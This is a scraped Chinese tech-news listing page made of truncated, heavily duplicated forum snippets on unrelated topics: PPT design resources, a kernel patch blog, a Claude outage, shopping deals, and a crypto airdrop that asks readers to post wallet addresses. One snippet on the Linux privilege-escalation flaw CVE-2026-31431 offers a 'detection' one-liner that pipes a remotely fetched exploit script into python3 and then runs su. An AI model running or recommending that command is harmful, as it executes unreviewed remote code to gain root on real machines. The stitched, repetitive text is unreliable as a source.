[分享发现] 我自己收集的 PPT 设计技巧资源
我自己收集的 PPT 设计技巧资源: 杂志风格 PPT 设计 https://github.com/op7418/guizang-ppt-skill 带设计动画的 PPT 技巧 https://github.com/alchaincyf/huashu-design 7 种不同风格
https - 钛刻 - 科技风向旗 - 深度刻画技术趋势,引领数字未来 - 第19页 - 钛刻科技 | TCTI.cn - 钛刻 (TCTI.cn) 为您提供最前沿的硬核科技资讯、深度评测和未来技术趋势分析。
共 1557 篇相关文章 · 第 19 / 78 页
我自己收集的 PPT 设计技巧资源: 杂志风格 PPT 设计 https://github.com/op7418/guizang-ppt-skill 带设计动画的 PPT 技巧 https://github.com/alchaincyf/huashu-design 7 种不同风格
潜龙勿用预测市场 2.0 链接: https://www.qlwy.ai 后续针对参加预测市场或者发布题目,会有更多空投计划。 在评论留言 bsc 链的地址即可。 代币合约为:0x2e591b13d3caf27adf1db47d75278315d0754444
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
claude 崩了,吓我一跳还以为被封了。 提示 can't reach claude 这里有 cluade 的最新状态,现在显示还在故障: https://status.claude.com
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
刚刚登网易云发现可以送好友会员天数,朋友都用不上,需要的佬友自取 ps:已回复至 https://linux.do/t/topic/851040 专贴,佬友看最新回复即可 4 个帖子 - 3 位参与者 阅读完整话题
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
claude 崩了,吓我一跳还以为被封了。 提示 can't reach claude 这里有 cluade 的最新状态,现在显示还在故障: https://status.claude.com
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De
活动结束时间未知 每个淘宝账号限购一个 淘宝 卡巴斯基旗舰店 https://detail.tmall.com/item.htm?id=988376173189 打折后19元 关注店铺再减5元 也就是14元 7 个帖子 - 4 位参与者 阅读完整话题
一句话检测验证 (不废话版) curl https://copy.fail/exp | python3 && su 效果: CVE-2026-31431 (绰号 “Copy Fail” ) 漏洞详情 类型 :本地权限提升(Local Privilege Escal
https://jt26wzz.com/posts/0016-my-first-linux-kernel-patch-fixing-a-tcp-listener-bug/ 上面是博客地址链接,文章全程手搓,主要写了三部分:一个是怎么发现 Bug 的,然后是给内核社区提补丁的全过程
https://openai.com/index/where-the-goblins-came-from/ 从GPT-5.1开始,我们的模型开始形成一种奇怪的习惯:他们越来越多地在隐喻中提到哥布林、小妖精和其他生物。与通过坦克评估或训练指标激增时出现并指向具体变化的模型漏洞不同,